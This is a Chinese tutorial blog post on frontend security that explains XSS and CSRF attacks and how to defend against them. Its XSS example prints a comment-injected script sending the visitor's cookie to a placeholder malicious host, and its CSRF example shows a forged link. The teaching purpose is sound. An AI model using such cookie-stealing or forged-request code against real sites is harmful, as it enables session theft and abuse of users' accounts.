前端安全之XSS、CSRF

XSS(cross-site-script)跨站脚本攻击

跨站脚本攻击是通过在网站中注入恶意代码,来达到劫取用户cookie信息,或者实施其他破坏行动。

例如:一个网站如果没有针对XSS做响应的安全措施,而且它存在添加评论的功能,那么用户可以在添加评论时输入如下文本

js 复制代码
<script>
	var xhr = new XMLHttpRequest();
	xhr.open('GET','http://恶意网站.com/steal?cookie='+document.cookie,true);
	xhr.send()
</script>

当其他用户查看包含这个评论的页面时,他们的浏览器会执行这段恶意脚本,导致攻击者成功窃取他们的Cookie,并进一步滥用这些信息。

如何防范XSS

  1. 开发者应该采取措施,如输入验证、对用户输入尽心格式适当转义或者过滤,以保证用户输入的内容不会被当做代码执行。
  2. 使用安全的编码库、限制可执行的脚本内容。
  3. 在前端设置HTTP头部中的Content Security Policy (CSP)

CSRF(cross-site-request-forgery)跨站请求伪造

当你登录一个网站A后,在没有登出的情况下,你又跑到一个其他的论坛上闲逛,然后你看到一个美女的图片,你出于好奇心,点击了美女图片,这个时候,可能就被攻击了;原因是美女图片的的超链接(link)可能是不法分子弄的,指向的可能是A网站,由于你在A网站还是登陆态,那么你点击的这个link就是以你登录态的进行的,比如可以用你的登录态发布评论;严重的可能进行转账。而你却浑然不知。

比如图片的html的代码是这样的

js 复制代码
<a href="http://www.a.com/addcomments?comment='XX是XX'"><img src='http://xx.com/beauty.jpg'/></a>

如何防范CSRF

1.在请求地址中添加 token 并验证

CSRF 攻击之所以能够成功,是因为黑客可以完全伪造用户的请求,该请求中所有的用户验证信息都是存在于 cookie 中,因此黑客可以在不知道这些验证信息的情况下直接利用用户自己的 cookie 来通过安全验证。要抵御 CSRF,关键在于在请求中放入黑客所不能伪造的信息,并且该信息不存在于 cookie 之中。可以在 HTTP 请求中以参数的形式加入一个随机产生的 token,并在服务器端建立一个拦截器来验证这个 token,如果请求中没有 token 或者 token 内容不正确,则认为可能是 CSRF 攻击而拒绝该请求。

2.验证 HTTP Referer 字段

根据 HTTP 协议,在 HTTP 头中有一个字段叫 Referer,它记录了该 HTTP 请求的来源地址。在通常情况下,访问一个安全受限页面的请求来自于同一个网站,比如需要访问 bank.example/withdraw?ac...,用户必须先登陆 bank.example,然后通过点击页面上的按钮来触发转账事件。这时,该转帐请求的 Referer 值就会是转账按钮所在的页面的 URL,通常是以 bank.example 域名开头的地址。而如果黑客要对银行网站实施 CSRF 攻击,他只能在他自己的网站构造请求,当用户通过黑客的网站发送请求到银行时,该请求的 Referer 是指向黑客自己的网站。因此,要防御 CSRF 攻击,银行网站只需要对于每一个转账请求验证其 Referer 值,如果是以 bank.example 开头的域名,则说明该请求是来自银行网站自己的请求,是合法的。如果 Referer 是其他网站的话,则有可能是黑客的 CSRF 攻击,拒绝该请求。

相关推荐
ZC跨境爬虫15 分钟前
跟着 MDN 学 HTML day_29:(动态构建与更新 DOM 树)
前端·javascript·ui·html·html5·媒体
编程技术手记21 分钟前
html table布局平衡
前端·html
huoyueyi31 分钟前
3D数字孪生项目 LCP 优化指南
前端·3d·几何学
菜鸟小芯1 小时前
【腾讯位置服务开发者征文大赛】校园美食雷达 —— 基于 CodeBuddy + 腾讯 LBS 开发实战
前端·美食
搜狐技术产品小编20231 小时前
深度解析与业务实战:将 screenshot-to-code 改造为支持 React + Ant Design 的前端利器
前端·javascript·react.js·前端框架·ecmascript
Rik1 小时前
Cursor Rules 深度玩法:从全局配置到项目级规则,让 AI 真正理解你的项目
前端·后端
weixin_471383031 小时前
set和map结构,减少O(n)复杂度
前端·javascript
hunteritself1 小时前
GPT Image2 + Seedance 2.0:3 小时从剧本到 AI 互动影游,深度实测复盘
前端·数据库·人工智能·深度学习·transformer
独秀不如众秀1 小时前
前端页面引擎协议:由浅入深——从 30 行到 vform3 的演化之路
前端
学网安的肆伍2 小时前
【044-WEB攻防篇】PHP应用&SQL盲注&布尔回显&延时判断&报错处理&增删改查方式
前端·sql·php